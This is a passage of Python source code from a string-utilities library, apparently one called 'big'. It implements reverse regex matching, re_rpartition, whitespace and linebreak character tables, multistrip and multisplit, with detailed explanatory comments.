need here is the *reverse* matches.\n #\n # consider this call:\n # re_rpartition('abcdefgh', '(abcdef|efg|ab|b|c|d)', count=4)\n #\n # re.finditer with that string and pattern yields one match:\n # 'abcdef'\n # but reverse searching, e.g. with\n # regex.finditer(flags=regex.REVERSE), yields four matches:\n # 'efg', 'd', 'c', 'ab'\n #\n # so what we do is: we ask re.finditer for all the forward\n # matches. then, for every match it found, we check every\n # overlapping character to see if there's a different match\n # there that we might prefer. if we prefer one of those,\n # we yield that--but we keep around the other matches,\n # because one of those (or a truncated version of it) might\n # also work.\n\n\n # matches and overlapping_matches are lists of 3-tuples of:\n # (end_pos, -start_pos, match)\n # if we sort the list, the last element will be the correct\n # last match in \"reverse\" order. see\n # https://en.wikipedia.org/wiki/Schwartzian_transform\n #\n # matches contains the list of matches we got directly from\n # re.finditer(), reversed. since this was found using re in\n # \"forward\" order, we need to check every match in this list\n # for potential overlapping matches.\n matches = [(match.end(), -match.start(), match) for match in pattern.finditer(string)]\n if not matches:\n # print(f\"no matches at all! exiting immediately.\")\n return\n\n # Does this pattern match zero-length strings?\n zero_length_match = pattern.match(string, 0, 0)\n if zero_length_match:\n # This pattern matches zero-length strings.\n # Since the rules are a little different for\n # zero-length strings when in reverse mode,\n # we need to doctor the match results a little.\n\n # These seem to be the rules:\n #\n # In forwards mode, we consider two matches to overlap\n # if they start at the same position, or if they have\n # any characters in common. There's an implicit\n # zero-length string at the beginning and end of every\n # string, so if the pattern matches against a zero-length\n # string at the start or end, and there isn't another\n # (longer) match that starts at that position, we'll\n # yield these matches too. Since only a zero-length\n # match can start at position len(string), we'll always\n # yield a zero-length match starting and ending at\n # position length(string) if the pattern matches there.\n #\n # In reverse mode, we consider two matches to overlap\n # if they end at the same position, or if they have any\n # characters in common with any other match. There's an\n # implicit zero-length string at the beginning and end of\n # every string, so if the pattern matches a zero-length\n # string at the start or end, and there isn't another\n # (longer) match that ends at that position, we'll yield\n # these matches too. Since only a zero-length match can\n # end at position 0, we'll always yield a zero-length\n # match starting and ending at position 0 if the pattern\n # matches there.\n\n # We need to ensure that, for every non-zero-length match,\n # if the pattern matches a zero-length string starting at\n # the same position, we have that zero-length match in\n # matches too.\n #\n # So specifically we're going to do this:\n #\n # for every match m in matches:\n # if m has nonzero length,\n # and the pattern matches a zero-length string\n # starting at m,\n # ensure that the zero-length match is also in matches.\n # elif m has zero length,\n # if we've already ensured that a zero-length\n # match starting at m.start() is in matches,\n # discard m.\n\n zeroes = set()\n new_matches = []\n append = new_matches.append\n last_start = -1\n for t in matches:\n match = t[2]\n start, end = match.span()\n\n if start not in zeroes:\n if (start == end):\n append(t)\n zeroes.add(start)\n continue\n\n zero_match = pattern.match(string, start, start)\n if zero_match:\n t_zero_length = (start, -start, zero_match)\n append(t_zero_length)\n zeroes.add(start)\n append(t)\n # del zeroes\n matches = new_matches\n\n matches.sort()\n\n # overlapping_matches is a list of the possibly-viable\n # overlapping matches we found from checking a match\n # we got from \"matches\".\n overlapping_matches = []\n\n result = []\n match = None\n\n # We truncate each match at the start\n # of the previously yielded match.\n #\n # The initial value allows the initial match\n # to extend all the way to the end of the string.\n previous_match_start = len(string)\n\n # cache some method lookups\n pattern_match = pattern.match\n append = overlapping_matches.append\n\n while True:\n if overlapping_matches:\n # overlapping_matches contains the overlapping\n # matches found *last* time around, before we\n # yielded the most recent match.\n #\n # The thing is, some of these matches might overlap that match.\n # But we only yield *non*-overlapping matches. So we need to\n # filter the matches in overlapping_matches accordingly.\n\n truncated_matches = []\n # (overlapping_matches will be set to truncated_matches in a few lines)\n append = truncated_matches.append\n\n for t in overlapping_matches:\n end, negated_start, match = t\n start = -negated_start\n if start > previous_match_start:\n # This match starts *after* the previous match started.\n # All matches starting at this position are no longer\n # viable. Throw away the match.\n continue\n if end <= previous_match_start:\n # This match ends *before* the previous match started.\n # In other words, this match is still 100% viable.\n # Keep it, we don't need to change it at all.\n append(t)\n continue\n\n # This match starts before the previous match started,\n # but ends after the previous match start.\n # In other words, it overlaps the previous match.\n #\n # So this match is itself no longer viable. But!\n # There might be a *different* match starting at this\n # position in the string. So we do a fresh re.match here,\n # stopping at the start of the previously yielded match.\n # (That's the third parameter, \"endpos\".)\n\n match = pattern_match(string, start, previous_match_start)\n if match:\n append((match.end(), -start, match))\n\n overlapping_matches = truncated_matches\n\n if (not overlapping_matches) and matches:\n # We don't currently have any pre-screened\n # overlapping matches we can use.\n #\n # But we *do* have a match (or matches) found in forwards mode.\n # Grab the next one that's still viable.\n\n scan_for_overlapping_matches = False\n while matches:\n t = matches.pop()\n end, negated_start, match = t\n start = -negated_start\n if end <= previous_match_start:\n assert start <= previous_match_start\n append(t)\n start += 1\n scan_for_overlapping_matches = True\n break\n\n if scan_for_overlapping_matches:\n # We scan every** position inside the match for an\n # overlapping match. All the matches we find go in\n # overlapping_matches, then we sort it and yield\n # the last one.\n #\n # ** We don't actually need to check the *first* position,\n # \"start\", because we already know what we'll find:\n # the match that we got from re.finditer() and\n # scanned for overlaps.\n #\n # As mentioned, the match we got from finditer\n # is viable here, so add it to the list.\n\n end = min(end, previous_match_start)\n for pos in range(start, end):\n match = pattern_match(string, pos, previous_match_start)\n if match:\n # print(f\" found {match=}\")\n append((match.end(), -pos, match))\n\n if not overlapping_matches:\n # matches and overlapping matches are both empty.\n # We've exhausted the matches. Stop iterating.\n return\n\n # overlapping_matches is now guaranteed current and non-empty.\n # We sort it so the rightmost match is last, and yield that.\n overlapping_matches.sort()\n match = overlapping_matches.pop()[2]\n previous_match_start = match.start()\n yield match\n return reversed_re_finditer(pattern, string)\n\n\n@_export\ndef re_rpartition(s, pattern, count=1, *, flags=0):\n \"\"\"\n Like str.rpartition, but pattern is matched as a regular expression.\n\n s can be a string or a bytes object.\n\n pattern can be a string, bytes, or an re.Pattern object.\n\n s and pattern (or pattern.pattern) must be the same type.\n\n If pattern is found in s, returns a tuple\n (before, match, after)\n where before is the text before the match,\n match is the re.Match object resulting from the match, and\n after is the text after the match.\n\n re_rpartition searches for pattern in s from right\n to left, and partitions at the non-overlapping\n matches it finds.\n\n If pattern matches multiple substrings of s, re_partition\n will match against the last (rightmost) appearance.\n\n If pattern is not found in s, returns a tuple\n ('', None, s)\n where the empty string is str or bytes as appropriate.\n\n To convert the output into a tuple of strings like str.rpartition,\n use\n t = re_rpartition(...)\n t2 = (t[0], t[1].group(0) if t[1] else '', t[2])\n\n Passing in an explicit \"count\" lets you control how many times\n re_rpartition partitions the string. re_rpartition will always\n return a tuple containing (2*count)+1 elements, and\n odd-numbered elements will be either re.Match objects or None.\n Passing in a count of 0 will always return a tuple containing s.\n\n If pattern is a string, flags is passed in\n as the flags argument to re.compile.\n\n You can pass in an instance of a subclass of bytes or str\n for s and pattern (or pattern.pattern), but the base class\n for both must be the same (str or bytes). re_rpartition will\n only return str or bytes objects.\n\n You can pass in a regex Pattern object (see the PyPi 'regex'\n package). Patterns using the \"Reverse Searching\" feature\n of 'regex' (the REVERSE flag or the '(?r)' token) are unsupported.\n\n (In older versions of Python, re.Pattern was a private type called\n re._pattern_type.)\n \"\"\"\n if isinstance(s, bytes):\n empty_string = b''\n extension = (b'', None)\n else:\n empty_string = ''\n extension = ('', None)\n\n # optimized fast path for the most frequent use case\n if count == 1:\n matches_iterator = reversed_re_finditer(pattern, s, flags)\n try:\n match = next(matches_iterator)\n before, separator, after = s.rpartition(match.group(0))\n return (before, match, after)\n except StopIteration:\n return (empty_string, None, s)\n\n if count == 0:\n return (s,)\n\n if count < 0:\n raise ValueError(\"count must be >= 0\")\n\n result = []\n extend = result.extend\n matches_iterator = reversed_re_finditer(pattern, s, flags)\n\n try:\n for remaining in range(count, 0, -1):\n match = next(matches_iterator)\n s, separator, after = s.rpartition(match.group(0))\n extend((after, match))\n extension = ()\n except StopIteration:\n extension *= remaining\n\n result.append(s)\n result.reverse()\n return extension + tuple(result)\n\n\n@_export\ndef _recursive_encode_strings(o, encoding):\n if isinstance(o, str):\n return o.encode(encoding)\n\n a = []\n if isinstance(o, dict):\n for k, v in o.items():\n k = _recursive_encode_strings(k, encoding)\n v = _recursive_encode_strings(v, encoding)\n a.append((k, v))\n else:\n for element in o:\n a.append(_recursive_encode_strings(element, encoding))\n return type(o)(a)\n\n@_export\ndef encode_strings(o, encoding='ascii'):\n \"\"\"\n Accepts a container object 'o' containing\n str objects; returns an equivalent object\n with the strings encoded to bytes.\n\n 'o' must be either dict, list, or tuple,\n or a subclass.\n\n Encodes every string inside using the encoding\n specified in the 'encoding' parameter, default\n is 'ascii'. Handles nested containers.\n\n If 'o' contains an object that is not a\n str, dict, list, or tuple, raises TypeError.\n \"\"\"\n if isinstance(o, str):\n raise TypeError('encode_strings only accepts tuple, list, or dict')\n return _recursive_encode_strings(o, encoding)\n\n\n# Tuples enumerating all the whitespace and newline characters,\n# for use with big functions taking \"separators\" arguments\n# (e.g. lines, multisplit). For an explanation of what they\n# represent, please see the \"Whitespace and line-breaking\n# characters in Python and big\" deep-dive in the big documentation.\n\n_export_name('str_whitespace')\nstr_whitespace = (\n # char decimal hex identity\n ##########################################\n '\\t' , # 9 - 0x0009 - tab\n '\\n' , # 10 - 0x000a - newline\n '\\v' , # 11 - 0x000b - vertical tab\n '\\f' , # 12 - 0x000c - form feed\n '\\r' , # 13 - 0x000d - carriage return\n '\\r\\n' , # bonus! the classic DOS newline sequence!\n '\\x1c' , # 28 - 0x001c - file separator\n '\\x1d' , # 29 - 0x001d - group separator\n '\\x1e' , # 30 - 0x001e - record separator\n '\\x1f' , # 31 - 0x001f - unit separator\n ' ' , # 32 - 0x0020 - space\n '\\x85' , # 133 - 0x0085 - next line\n '\\xa0' , # 160 - 0x00a0 - non-breaking space\n '\\u1680', # 5760 - 0x1680 - ogham space mark\n '\\u2000', # 8192 - 0x2000 - en quad\n '\\u2001', # 8193 - 0x2001 - em quad\n '\\u2002', # 8194 - 0x2002 - en space\n '\\u2003', # 8195 - 0x2003 - em space\n '\\u2004', # 8196 - 0x2004 - three-per-em space\n '\\u2005', # 8197 - 0x2005 - four-per-em space\n '\\u2006', # 8198 - 0x2006 - six-per-em space\n '\\u2007', # 8199 - 0x2007 - figure space\n '\\u2008', # 8200 - 0x2008 - punctuation space\n '\\u2009', # 8201 - 0x2009 - thin space\n '\\u200a', # 8202 - 0x200a - hair space\n '\\u2028', # 8232 - 0x2028 - line separator\n '\\u2029', # 8233 - 0x2029 - paragraph separator\n '\\u202f', # 8239 - 0x202f - narrow no-break space\n '\\u205f', # 8287 - 0x205f - medium mathematical space\n '\\u3000', # 12288 - 0x3000 - ideographic space\n )\n_export_name('str_whitespace_without_crlf')\nstr_whitespace_without_crlf = tuple(s for s in str_whitespace if s != '\\r\\n')\n\n_export_name('whitespace')\nwhitespace = str_whitespace\n_export_name('whitespace_without_crlf')\nwhitespace_without_crlf = str_whitespace_without_crlf\n\n_export_name('unicode_whitespace')\nunicode_whitespace = tuple(s for s in str_whitespace if not ('\\x1c' <= s <= '\\x1f'))\n_export_name('unicode_whitespace_without_crlf')\nunicode_whitespace_without_crlf = tuple(s for s in unicode_whitespace if s != '\\r\\n')\n\n_export_name('ascii_whitespace')\nascii_whitespace = tuple(s for s in unicode_whitespace if (s < '\\x80'))\n_export_name('ascii_whitespace_without_crlf')\nascii_whitespace_without_crlf = tuple(s for s in ascii_whitespace if s != '\\r\\n')\n\n_export_name('bytes_whitespace')\nbytes_whitespace = encode_strings(ascii_whitespace)\n_export_name('bytes_whitespace_without_crlf')\nbytes_whitespace_without_crlf = tuple(s for s in bytes_whitespace if s != b'\\r\\n')\n\n\n_export_name('str_linebreaks')\nstr_linebreaks = (\n # char decimal hex identity\n ##########################################\n '\\n' , # 10 - 0x000a - newline\n '\\v' , # 11 - 0x000b - vertical tab\n '\\f' , # 12 - 0x000c - form feed\n '\\r' , # 13 - 0x000d - carriage return\n '\\r\\n' , # bonus! the classic DOS newline sequence!\n '\\x1c' , # 28 - 0x001c - file separator\n '\\x1d' , # 29 - 0x001d - group separator\n '\\x1e' , # 30 - 0x001e - record separator\n '\\x85' , # 133 - 0x0085 - next line\n '\\u2028', # 8232 - 0x2028 - line separator\n '\\u2029', # 8233 - 0x2029 - paragraph separator\n\n # what about '\\n\\r'?\n # sorry, Acorn and RISC OS users, you'll have to add this yourselves.\n # I'm worried it would cause bugs with a malformed DOS string,\n # or maybe when operating in reverse mode.\n #\n # Also: welcome, Acorn and RISC OS users!\n # What are you doing here? You can't run Python 3.6+!\n )\n_export_name('str_linebreaks_without_crlf')\nstr_linebreaks_without_crlf = tuple(s for s in str_linebreaks if s != '\\r\\n')\n\n_export_name('linebreaks')\nlinebreaks = str_linebreaks\n_export_name('linebreaks_without_crlf')\nlinebreaks_without_crlf = str_linebreaks_without_crlf\n\n_export_name('unicode_linebreaks')\nunicode_linebreaks = tuple(s for s in str_linebreaks if not ('\\x1c' <= s <= '\\x1f'))\n_export_name('unicode_linebreaks_without_crlf')\nunicode_linebreaks_without_crlf = tuple(s for s in unicode_linebreaks if s != '\\r\\n')\n\n_export_name('ascii_linebreaks')\nascii_linebreaks = tuple(s for s in unicode_linebreaks if s < '\\x80')\n_export_name('ascii_linebreaks_without_crlf')\nascii_linebreaks_without_crlf = tuple(s for s in ascii_linebreaks if s != '\\r\\n')\n\n_export_name('bytes_linebreaks')\nbytes_linebreaks = (\n b'\\n' , # 10 0x000a - newline\n b'\\r' , # 13 0x000d - carriage return\n b'\\r\\n' , # the classic DOS newline sequence\n )\n_export_name('bytes_linebreaks_without_crlf')\nbytes_linebreaks_without_crlf = tuple(s for s in bytes_linebreaks if s != b'\\r\\n')\n\n\n# Before 10.1, big used the word \"newlines\" instead of \"linebreaks\"\n# in the names of these tuples. I realized in September 2023 that\n# \"linebreaks\" was a better name; Unicode uses the term \"line breaks\"\n# for these characters.\n#\n# Similarly, \"_without_crlf\" used to be \"_without_dos\". As much\n# as we might dream about a world without DOS, _without_crlf is\n# far more accurate.\n#\n# Here's some backwards-compatibility for you.\n# I promise to keep the old names around until September 2024.\n_export_name('whitespace_without_dos')\nwhitespace_without_dos = str_whitespace_without_crlf\n\n_export_name('ascii_whitespace_without_dos')\nascii_whitespace_without_dos = bytes_whitespace_without_crlf\n\n_export_name('newlines')\nnewlines = str_linebreaks\n_export_name('newlines_without_dos')\nnewlines_without_dos = str_linebreaks_without_crlf\n\n_export_name('ascii_newlines')\nascii_newlines = bytes_linebreaks\n_export_name('ascii_newlines_without_dos')\nascii_newlines_without_dos = bytes_linebreaks_without_crlf\n\n# These old tuples are deprecated, because it's easy to make\n# them yourself (and a million other variants) with encode_strings().\n# They'll be removed when I remove the backwards-compatibility\n# names above.\n_export_name('utf8_whitespace')\nutf8_whitespace = encode_strings(str_whitespace, \"utf-8\")\n_export_name('utf8_whitespace_without_dos')\nutf8_whitespace_without_dos = tuple(b for b in utf8_whitespace if b != b'\\r\\n')\n\n_export_name('utf8_newlines')\nutf8_newlines = encode_strings(str_linebreaks, \"utf-8\")\n_export_name('utf8_newlines_without_dos')\nutf8_newlines_without_dos = tuple(b for b in utf8_newlines if b != b'\\r\\n')\n\n\n# reverse an iterable thing.\n# o must be str, bytes, list, tuple, set, or frozenset.\n# if o is a collection (not str or bytes),\n# the elements of o are recursively reversed.\n# value returned is the same type as o.\n#\n# we don't need to bother checking the type of o.\n# _multisplit_reversed is an internal function\n# and I've manually checked every call site.\ndef _multisplit_reversed(o, name='s'):\n if isinstance(o, str):\n if len(o) <= 1:\n return o\n return \"\".join(reversed(o))\n if isinstance(o, bytes):\n if len(o) <= 1:\n return o\n return b\"\".join(o[i:i+1] for i in range(len(o)-1, -1, -1))\n # assert isinstance(o, (list, tuple, set, frozenset))\n t = type(o)\n return t(_multisplit_reversed(p) for p in o)\n\n\n# _reversed_builtin_separators precalculates the reversed versions\n# of the builtin separators. we use the reversed versions when\n# reverse=True. this is a minor speed optimization, particularly\n# as it helps with the lrucache for _separators_to_re.\n#\n# we test that these cached versions are correct in tests/test_text.py.\n#\n_reversed_utf8_whitespace_without_dos = _multisplit_reversed(utf8_whitespace_without_dos)\n_reversed_utf8_newlines_without_dos = _multisplit_reversed(utf8_newlines_without_dos)\n\n_reversed_builtin_separators = {\n str_whitespace: str_whitespace_without_crlf + ('\\n\\r',),\n str_whitespace_without_crlf: str_whitespace_without_crlf,\n\n unicode_whitespace: unicode_whitespace_without_crlf + ('\\n\\r',),\n unicode_whitespace_without_crlf: unicode_whitespace_without_crlf,\n\n ascii_whitespace: ascii_whitespace_without_crlf + (\"\\n\\r\",),\n ascii_whitespace_without_crlf: ascii_whitespace_without_crlf,\n\n str_linebreaks: str_linebreaks_without_crlf + (\"\\n\\r\",),\n str_linebreaks_without_crlf: str_linebreaks_without_crlf,\n\n unicode_linebreaks: unicode_linebreaks_without_crlf + (\"\\n\\r\",),\n unicode_linebreaks_without_crlf: unicode_linebreaks_without_crlf,\n\n bytes_linebreaks: bytes_linebreaks_without_crlf + (b\"\\n\\r\",),\n bytes_linebreaks_without_crlf: bytes_linebreaks_without_crlf,\n\n # deprecated\n utf8_whitespace: _reversed_utf8_whitespace_without_dos + (b\"\\n\\r\",),\n utf8_whitespace_without_dos: _reversed_utf8_whitespace_without_dos,\n\n utf8_newlines: _reversed_utf8_newlines_without_dos + (b\"\\n\\r\",),\n utf8_newlines_without_dos: _reversed_utf8_newlines_without_dos,\n }\n\n\ndef _re_quote(s):\n # don't bother escaping whitespace.\n # re.escape escapes whitespace because of VERBOSE mode,\n # which we're not using. (escaping the whitespace doesn't\n # hurt anything really, but it makes the patterns harder\n # to read for us humans.)\n if not s.isspace():\n return re.escape(s)\n if len(s) > 1:\n if isinstance(s, bytes):\n return b\"(?:\" + s + b\")\"\n return f\"(?:{s})\"\n return s\n\n\n@functools.lru_cache(re._MAXCACHE)\ndef __separators_to_re(separators, separators_is_bytes, separate=False, keep=False):\n if separators_is_bytes:\n pipe = b'|'\n separate_start = b'(?:'\n separate_end = b')+'\n keep_start = b'('\n keep_end = b')'\n else:\n pipe = '|'\n separate_start = '(?:'\n separate_end = ')+'\n keep_start = '('\n keep_end = ')'\n\n # sort longer separator strings earlier.\n # re processes | operator from left-to-right,\n # so you want to match against longer strings first.\n separators = list(separators)\n separators.sort(key=lambda o: -len(o))\n pattern = pipe.join(_re_quote(o) for o in separators)\n if not separate:\n pattern = separate_start + pattern + separate_end\n if keep:\n pattern = keep_start + pattern + keep_end\n return pattern\n\ndef _separators_to_re(separators, separators_is_bytes, separate=False, keep=False):\n # this ensures that separators is hashable,\n # which will keep functools.lru_cache happy.\n try:\n hash(separators)\n except TypeError:\n separators = tuple(separators)\n return __separators_to_re(separators, separators_is_bytes, separate=bool(separate), keep=bool(keep))\n\n\n\n@_export\ndef multistrip(s, separators, left=True, right=True):\n \"\"\"\n Like str.strip, but supports stripping multiple strings.\n\n Strips from the string \"s\" all leading and trailing\n instances of strings found in \"separators\".\n\n Returns a copy of s with the leading and/or trailing\n separators stripped. (If left and right are both false,\n the contents are unchanged.)\n\n s should be str or bytes.\n separators should be an iterable of either str or bytes\n objects matching the type of s.\n\n If left is a true value, strips all leading separators\n from s.\n\n If right is a true value, strips all trailing separators\n from s.\n\n multistrip first removes leading separators, until the\n string does not start with a separator (or is empty).\n Then it removes trailing separators, until the string\n until the string does not end with a separator (or is\n empty).\n\n multistrip is \"greedy\"; if more than one separator\n matches, multistrip will strip the longest one.\n\n You can pass in an instance of a subclass of bytes or str\n for s and elements of separators, but the base class\n for both must be the same (str or bytes). multistrip will\n only return str or bytes objects, even if left and right\n are both false.\n \"\"\"\n\n is_bytes = isinstance(s, bytes)\n if is_bytes:\n s_type = bytes\n head = b'^'\n tail = b'$'\n\n if isinstance(separators, str):\n raise TypeError(\"separators must be an iterable of non-empty objects the same type as s\")\n if isinstance(separators, bytes):\n # not iterable of bytes, literally a bytes string.\n # split it ourselves. otherwise, _separators_to_re will\n # iterate over it, which... yields integers! oops!\n separators = tuple(_iterate_over_bytes(separators))\n check_separators = False\n else:\n check_separators = True\n else:\n s_type = str\n head = '^'\n tail = '$'\n\n if isinstance(separators, bytes):\n raise TypeError(\"separators must be an iterable of non-empty objects the same type as s\")\n if isinstance(separators, str):\n separators = tuple(separators)\n check_separators = False\n else:\n check_separators = True\n\n if not separators:\n raise ValueError(\"separators must be an iterable of non-empty objects the same type as s\")\n if check_separators:\n s2 = []\n for o in separators:\n if not isinstance(o, s_type):\n raise TypeError(\"separators must be an iterable of non-empty objects the same type as s\")\n if not o:\n raise ValueError(\"separators must be an iterable of non-empty objects the same type as s\")\n s2.append(o)\n separators = tuple(s2)\n\n # deliberately do this *after* checking types,\n # so we complain about bad types even if this is a do-nothing call.\n if not (left or right):\n return s\n\n # we can sidestep the hashability test of _separators_to_re,\n # separators is guaranteed to always a tuple at this point\n pattern = __separators_to_re(separators, is_bytes, separate=False, keep=False)\n\n start = 0\n end = len(s)\n if left:\n left_match = re.match(head + pattern, s)\n if left_match:\n start = left_match.end(0)\n s = s[start:]\n if right:\n right_match = re.search(pattern + tail, s)\n if right_match:\n end = right_match.start(0)\n s = s[:end]\n return s\n\n\n# for keep\nAS_PAIRS=\"AS_PAIRS\"\n_export_name(AS_PAIRS)\nALTERNATING=\"ALTERNATING\"\n_export_name(ALTERNATING)\n\n# for strip\nLEFT = \"LEFT\"\n_export_name(LEFT)\nRIGHT = \"RIGHT\"\n_export_name(RIGHT)\nPROGRESSIVE = \"PROGRESSIVE\"\n_export_name(PROGRESSIVE)\n\n@_export\ndef multisplit(s, separators=None, *,\n keep=False,\n maxsplit=-1,\n reverse=False,\n separate=False,\n strip=False,\n ):\n \"\"\"\n Splits strings like str.split, but with multiple separators and options.\n\n s can be str or bytes.\n\n separators should either be None (the default),\n or an iterable of str or bytes, matching s.\n\n If separators is None and s is str, multisplit will\n use big.whitespace as the list of separators.\n If separators is None and s is bytes, multisplit will\n use big.ascii_whitespace as the list of separators.\n\n Returns an iterator yielding the strings split from s. If keep\n is true (or ALTERNATING), and strip is false, joining these strings\n together will recreate s.\n\n multisplit is \"greedy\": if two or more separators start at the same\n location in \"s\", multisplit splits using the longest matching separator.\n For example:\n big.multisplit('wxabcyz', ('a', 'abc'))\n yields 'wx' then 'yz'.\n\n \"keep\" indicates whether or not multisplit should keep the separator\n strings. It supports four values:\n false (the default)\n Discard the separators.\n true (apart from ALTERNATING and AS_PAIRS)\n Append the separators to the end of the split strings.\n You can recreate the original string by passing the\n list returned in to ''.join.\n ALTERNATING\n Yield alternating strings in the output: strings consisting\n of separators, alternating with strings consisting of\n non-separators. If \"separate\" is true, separator strings\n will contain exactly one separator, and non-separator strings\n may be empty; if \"separate\" is false, separator strings will\n contain one or more separators, and non-separator strings\n will never be empty.\n You can recreate the original string by passing the\n list returned in to ''.join.\n AS_PAIRS\n Yield 2-tuples containing a non-separator string and its\n subsequent separator string. Either string may be empty;\n the separator string in the last 2-tuple will always be\n empty, and if `s` ends with a separator string, *both*\n strings in the final 2-tuple will be empty.\n\n \"separate\" indicates whether multisplit should consider adjacent\n separator strings in s as one separator or as multiple separators\n each separated by a zero-length string. It supports two values:\n false (the default)\n Multiple adjacent separators should be considered one\n separator.\n true\n Don't group separators together. Each separator should\n split the string individually, even if there are no\n characters between two separators.\n\n \"strip\" indicates whether multisplit should strip separators from\n the beginning and/or end of s, a la multistrip. It supports\n six values:\n false (the default)\n Don't strip separators from the beginning or end of s.\n true (apart from LEFT, RIGHT, and PROGRESSIVE)\n Strip separators from the beginning and end of s\n (a la str.strip).\n LEFT\n Strip separators only from the beginning of s\n (a la str.lstrip).\n RIGHT\n Strip separators only from the end of s\n (a la str.rstrip).\n PROGRESSIVE\n Strip from the beginning and end of s, unless maxsplit\n is nonzero and the entire string is not split. If\n splitting stops due to maxsplit before the entire string\n is split, and reverse is false, don't strip the end of\n the string. If splitting stops due to maxsplit before\n the entire string is split, and reverse is true, don't\n strip the beginning of the string. (This is how str.strip\n and str.rstrip behave when sep=None.)\n\n \"maxsplit\" should be either an integer or None. If maxsplit is an\n integer greater than -1, multisplit will split s no more than\n maxsplit times.\n\n \"reverse\" controls whether multisplit splits starting from the\n beginning or from the end of the string. It supports two values:\n false (the default)\n Start splitting from the beginning of the string\n and scanning right.\n true\n Start splitting from the end of the string and\n scanning left.\n Splitting from the end of the string and scanning left has two\n effects. First, if maxsplit is a number greater than 0,\n the splits will start at the end of the string rather than\n the beginning. Second, if there are overlapping instances of\n separators in the string, multisplit will prefer the rightmost\n separator rather than the left. For example:\n multisplit(\"A x x Z\", (\" x \",), keep=big.ALTERNATING)\n will split on the leftmost instance of \" x \", yielding\n \"A\", \" x \", \"x Z\"\n whereas\n multisplit(\"A x x Z\", (\" x \",), keep=big.ALTERNATING, reverse=True)\n will split on the rightmost instance of \" x \", yielding\n \"A x\", \" x \", \"Z\"\n\n You can pass in an instance of a subclass of bytes or str\n for s and elements of separators, but the base class\n for both must be the same (str or bytes). multisplit will\n only return str or bytes objects.\n \"\"\"\n is_bytes = isinstance(s, bytes)\n separators_is_bytes = isinstance(separators, bytes)\n separators_is_str = isinstance(separators, str)\n\n if is_bytes:\n if separators_is_bytes:\n # not iterable of bytes, literally a bytes string.\n # split it ourselves.\n separators = tuple(_iterate_over_bytes(separators))\n check_separators = False\n else:\n if separators_is_str:\n raise TypeError(f\"separators must be either None or an iterable of objects the same type as s; s is {type(s).__name__}, separators is {separators!r}\")\n check_separators = True\n empty = b''\n s_type = bytes\n else:\n if separators_is_bytes:\n raise TypeError(f\"separators must be either None or an iterable of objects the same type as s; s is {type(s).__name__}, separators is {separators!r}\")\n check_separators = True\n empty = ''\n s_type = str\n\n if separators is None:\n separators = bytes_whitespace if is_bytes else whitespace\n check_separators = False\n elif not separators:\n raise ValueError(f\"separators must be either None or an iterable of objects the same type as s; s is {type(s).__name__}, separators is {separators!r}\")\n\n # check_separators is True if separators isn't str or bytes\n # or something we split ourselves.\n if check_separators:\n if not hasattr(separators, '__iter__'):\n raise TypeError(f\"separators must be either None or an iterable of objects the same type as s; s is {type(s).__name__}, separators is {separators!r}\")\n for o in separators:\n if not isinstance(o, s_type):\n raise TypeError(f\"separators must be either None or an iterable of objects the same type as s; s is {type(s).__name__}, separators is {separators!r}\")\n\n separators_to_re_keep = keep\n\n if strip:\n if strip == PROGRESSIVE:\n if maxsplit == -1:\n strip = left = right = True\n else:\n left = not reverse\n right = reverse\n separators_to_re_keep = True\n else:\n left = strip != RIGHT\n right = strip != LEFT\n s = multistrip(s, separators, left=left, right=right)\n if not s:\n # oops! all separators!\n # this will make us exit early, just a few lines down from here.\n maxsplit = 0\n\n def multisplit(s, separators, keep, maxsplit, reverse, separate, strip):\n if maxsplit == None:\n maxsplit = -1\n elif maxsplit == 0:\n if keep == ALTERNATING:\n yield s\n elif keep == AS_PAIRS:\n yield (s, empty)\n else:\n yield s\n return\n\n # convert maxsplit for use with re.split.\n #\n # re.split interprets maxsplit slightly differently:\n # its maxsplit==0 means \"allow all splits\".\n # its maxsplit==1 means \"only allow one split\".\n #\n # (re.split doesn't have a way to express\n # \"don't split\" with its maxsplit parameter,\n # which is why we handled it already.)\n re_split_maxsplit = 0 if maxsplit == -1 else maxsplit\n\n if reverse:\n # if reverse is true, when separators overlap,\n # we need to prefer the rightmost one rather than\n # the leftmost one. how do we do *that*?\n # Eric Smith had the brainstorm: reverse the string\n # and the separators, split, and reverse the output\n # and the strings in the output.\n s = _multisplit_reversed(s, 's')\n separators = tuple(separators)\n s2 = _reversed_builtin_separators.get(separators, None)\n if s2 != None:\n separators = s2\n else:\n separators = _multisplit_reversed(separators, 'separators')\n\n pattern = _separators_to_re(separators, is_bytes, keep=separators_to_re_keep, separate=separate)\n # print(\"PATTERN\", pattern, f\"{separators_to_re_keep=} {separate=}\")\n\n l = re.split(pattern, s, re_split_maxsplit)\n assert l\n # print(\"S\", repr(s), \"L\", l, f\"{re_split_maxsplit=}\")\n\n if strip == PROGRESSIVE:\n # l alternates nonsep and sep strings.\n # it's always an odd length, starting and ending with nonsep.\n length = len(l)\n assert length & 1\n\n desired_length = 1 + (2*maxsplit)\n\n # dang! this is complicated!\n # maxsplit has to extend *past* the last nonsep\n # for us to strip on the far side.\n # ' a b c '.split(None, maxsplit=2) => ['a', 'b', 'c ']\n # ' a b c '.split(None, maxsplit=3) => ['a', 'b', 'c']\n for i in range(length - 1, 0, -2):\n nonsep = l[i]\n if nonsep:\n last_non_empty_nonsep = i\n break\n else:\n last_non_empty_nonsep = 0\n\n if desired_length > (last_non_empty_nonsep + 2):\n # strip!\n l = l[:last_non_empty_nonsep + 1]\n desired_length = length = last_non_empty_nonsep\n\n if not keep:\n for i in range(len(l) - 2, 0, -2):\n del l[i]\n\n if reverse:\n l = _multisplit_reversed(l, 'l')\n l.reverse()\n\n if not keep:\n l.reverse()\n while l:\n yield l.pop()\n return\n\n # from here on out, we're 'keep'-ing the separator strings.\n # (we're returning the separator strings in one form or another.)\n\n if keep == ALTERNATING:\n l.reverse()\n while l:\n yield l.pop()\n return\n\n if (len(l) % 2) == 1:\n l.append(empty)\n\n previous = None\n l.reverse()\n while l:\n o = l.pop()\n if previous is None:\n previous = o\n continue\n if keep == AS_PAIRS:\n yield (previous, o)\n else:\n yield previous + o\n previous = None\n\n return multisplit(s, separators, keep, maxsplit, reverse, separate, strip)\n\n\n@_export\ndef multipartition(s, separators, count=1, *, reverse=False, separate=True):\n \"\"\"\n Like str.partition, but supports partitioning based on multiple separator\n strings, and can partition more than once.\n\n \"s\" can be str or bytes.\n\n \"separators\" should be an iterable of objects of the same type as \"s\".\n\n By default, if any of the strings in \"separators\" are found in \"s\",\n returns a tuple of three strings: the portion of \"s\" leading up to\n the earliest separator, the separator, and the portion of \"s\" after\n that separator. 